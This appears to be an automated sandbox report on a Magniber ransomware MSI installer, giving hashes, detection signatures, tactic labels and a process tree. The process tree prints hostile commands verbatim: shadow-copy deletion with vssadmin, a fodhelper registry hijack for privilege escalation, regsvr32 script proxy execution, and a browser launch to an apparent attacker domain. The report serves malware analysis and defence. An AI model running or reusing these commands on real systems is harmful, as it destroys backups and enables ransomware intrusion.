Analysis
-
max time kernel
141s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-08-2024 01:34
Static task
static1
Behavioral task
behavioral1
Sample
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
Resource
win10v2004-20240802-en
General
-
Target
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi
-
Size
96KB
-
MD5
42ad49ed99c0d41a820316309bc2c3b3
-
SHA1
f447a72b3cbea72e1b56fda8f44fd9f304b4474a
-
SHA256
41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
-
SHA512
4e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
SSDEEP
1536:kiqCWq/Gf2CJ7ZrhzZr98n+lW0D80D+7fxun:xqCWqu+q8nLLxun
Malware Config
Signatures
-
Detect magniber ransomware 1 IoCs
resource yara_rule behavioral2/memory/2580-11-0x000001DC6AC30000-0x000001DC6AC33000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (59) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
System Binary Proxy Execution: Regsvr32 1 TTPs 9 IoCs
Abuse Regsvr32 to proxy execution of malicious code.
pid Process 3116 regsvr32.exe 4412 regsvr32.exe 3184 regsvr32.exe 2664 regsvr32.exe 3304 regsvr32.exe 1952 regsvr32.exe 244 regsvr32.exe 4884 regsvr32.exe 1972 regsvr32.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4528 set thread context of 2580 4528 MsiExec.exe 42 PID 4528 set thread context of 2616 4528 MsiExec.exe 43 PID 4528 set thread context of 2800 4528 MsiExec.exe 48 -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e57a327.msi msiexec.exe File created C:\Windows\Installer\SourceHash{806B562E-D37E-4F22-8C47-582974C985AC} msiexec.exe File opened for modification C:\Windows\Installer\MSIA71E.tmp msiexec.exe File created C:\Windows\Installer\e57a325.msi msiexec.exe File opened for modification C:\Windows\Installer\e57a325.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIA3D1.tmp msiexec.exe -
Loads dropped DLL 1 IoCs
pid Process 4528 MsiExec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 640 msiexec.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b58935fac5ebb7730000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000b58935fa0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900b58935fa000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1db58935fa000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b58935fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3992 vssadmin.exe 1912 vssadmin.exe 996 vssadmin.exe 824 vssadmin.exe 4344 vssadmin.exe 2684 vssadmin.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2916 msiexec.exe 2916 msiexec.exe 4528 MsiExec.exe 4528 MsiExec.exe 3756 msedge.exe 3756 msedge.exe 3336 msedge.exe 3336 msedge.exe 3944 identity_helper.exe 3944 identity_helper.exe 208 msedge.exe 208 msedge.exe 208 msedge.exe 208 msedge.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4528 MsiExec.exe 4528 MsiExec.exe 4528 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 640 msiexec.exe Token: SeIncreaseQuotaPrivilege 640 msiexec.exe Token: SeSecurityPrivilege 2916 msiexec.exe Token: SeCreateTokenPrivilege 640 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 640 msiexec.exe Token: SeLockMemoryPrivilege 640 msiexec.exe Token: SeIncreaseQuotaPrivilege 640 msiexec.exe Token: SeMachineAccountPrivilege 640 msiexec.exe Token: SeTcbPrivilege 640 msiexec.exe Token: SeSecurityPrivilege 640 msiexec.exe Token: SeTakeOwnershipPrivilege 640 msiexec.exe Token: SeLoadDriverPrivilege 640 msiexec.exe Token: SeSystemProfilePrivilege 640 msiexec.exe Token: SeSystemtimePrivilege 640 msiexec.exe Token: SeProfSingleProcessPrivilege 640 msiexec.exe Token: SeIncBasePriorityPrivilege 640 msiexec.exe Token: SeCreatePagefilePrivilege 640 msiexec.exe Token: SeCreatePermanentPrivilege 640 msiexec.exe Token: SeBackupPrivilege 640 msiexec.exe Token: SeRestorePrivilege 640 msiexec.exe Token: SeShutdownPrivilege 640 msiexec.exe Token: SeDebugPrivilege 640 msiexec.exe Token: SeAuditPrivilege 640 msiexec.exe Token: SeSystemEnvironmentPrivilege 640 msiexec.exe Token: SeChangeNotifyPrivilege 640 msiexec.exe Token: SeRemoteShutdownPrivilege 640 msiexec.exe Token: SeUndockPrivilege 640 msiexec.exe Token: SeSyncAgentPrivilege 640 msiexec.exe Token: SeEnableDelegationPrivilege 640 msiexec.exe Token: SeManageVolumePrivilege 640 msiexec.exe Token: SeImpersonatePrivilege 640 msiexec.exe Token: SeCreateGlobalPrivilege 640 msiexec.exe Token: SeBackupPrivilege 4492 vssvc.exe Token: SeRestorePrivilege 4492 vssvc.exe Token: SeAuditPrivilege 4492 vssvc.exe Token: SeBackupPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeBackupPrivilege 4608 srtasks.exe Token: SeRestorePrivilege 4608 srtasks.exe Token: SeSecurityPrivilege 4608 srtasks.exe Token: SeTakeOwnershipPrivilege 4608 srtasks.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe Token: SeTakeOwnershipPrivilege 2916 msiexec.exe Token: SeRestorePrivilege 2916 msiexec.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 640 msiexec.exe 640 msiexec.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe 3336 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2916 wrote to memory of 4608 2916 msiexec.exe 91 PID 2916 wrote to memory of 4608 2916 msiexec.exe 91 PID 2916 wrote to memory of 4528 2916 msiexec.exe 93 PID 2916 wrote to memory of 4528 2916 msiexec.exe 93 PID 2580 wrote to memory of 1952 2580 sihost.exe 94 PID 2580 wrote to memory of 1952 2580 sihost.exe 94 PID 2616 wrote to memory of 3116 2616 svchost.exe 95 PID 2616 wrote to memory of 3116 2616 svchost.exe 95 PID 2800 wrote to memory of 4412 2800 taskhostw.exe 96 PID 2800 wrote to memory of 4412 2800 taskhostw.exe 96 PID 4528 wrote to memory of 3716 4528 MsiExec.exe 97 PID 4528 wrote to memory of 3716 4528 MsiExec.exe 97 PID 3716 wrote to memory of 3336 3716 cmd.exe 99 PID 3716 wrote to memory of 3336 3716 cmd.exe 99 PID 3336 wrote to memory of 3432 3336 msedge.exe 100 PID 3336 wrote to memory of 3432 3336 msedge.exe 100 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 5028 3336 msedge.exe 101 PID 3336 wrote to memory of 3756 3336 msedge.exe 102 PID 3336 wrote to memory of 3756 3336 msedge.exe 102 PID 3336 wrote to memory of 1284 3336 msedge.exe 103 PID 3336 wrote to memory of 1284 3336 msedge.exe 103 PID 3336 wrote to memory of 1284 3336 msedge.exe 103 PID 3336 wrote to memory of 1284 3336 msedge.exe 103 PID 3336 wrote to memory of 1284 3336 msedge.exe 103 PID 3336 wrote to memory of 1284 3336 msedge.exe 103 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
PID:1952
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:2228
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4796
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:244 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2684
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:3560
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:4228
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:1972 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:824
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
PID:3116
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4652
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:3600
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:4884 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3992
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4044
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:1636
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:2664 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4344
-
-
-
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/x5m0mhr74m72⤵
- System Binary Proxy Execution: Regsvr32
- Modifies registry class
PID:4412
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:1972
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:3120
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:3184 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:1912
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:3600
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:1584
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/dsv3cwbg27yh4⤵
- System Binary Proxy Execution: Regsvr32
PID:3304 -
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:996
-
-
-
-
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\41ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:640
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 5C2F3D29235E4915D85FD8E182F245CF2⤵
- Suspicious use of SetThreadContext
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://56d8063048503c0068tbodbmuw.ofrisk.info/tbodbmuw^&2^&40162822^&59^&397^&22190413⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://56d8063048503c0068tbodbmuw.ofrisk.info/tbodbmuw&2&40162822&59&397&22190414⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff296a46f8,0x7fff296a4708,0x7fff296a47185⤵PID:3432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:25⤵PID:5028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:3756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:85⤵PID:1284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:15⤵PID:3308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:15⤵PID:5000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:15⤵PID:2528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:15⤵PID:4840
-
-
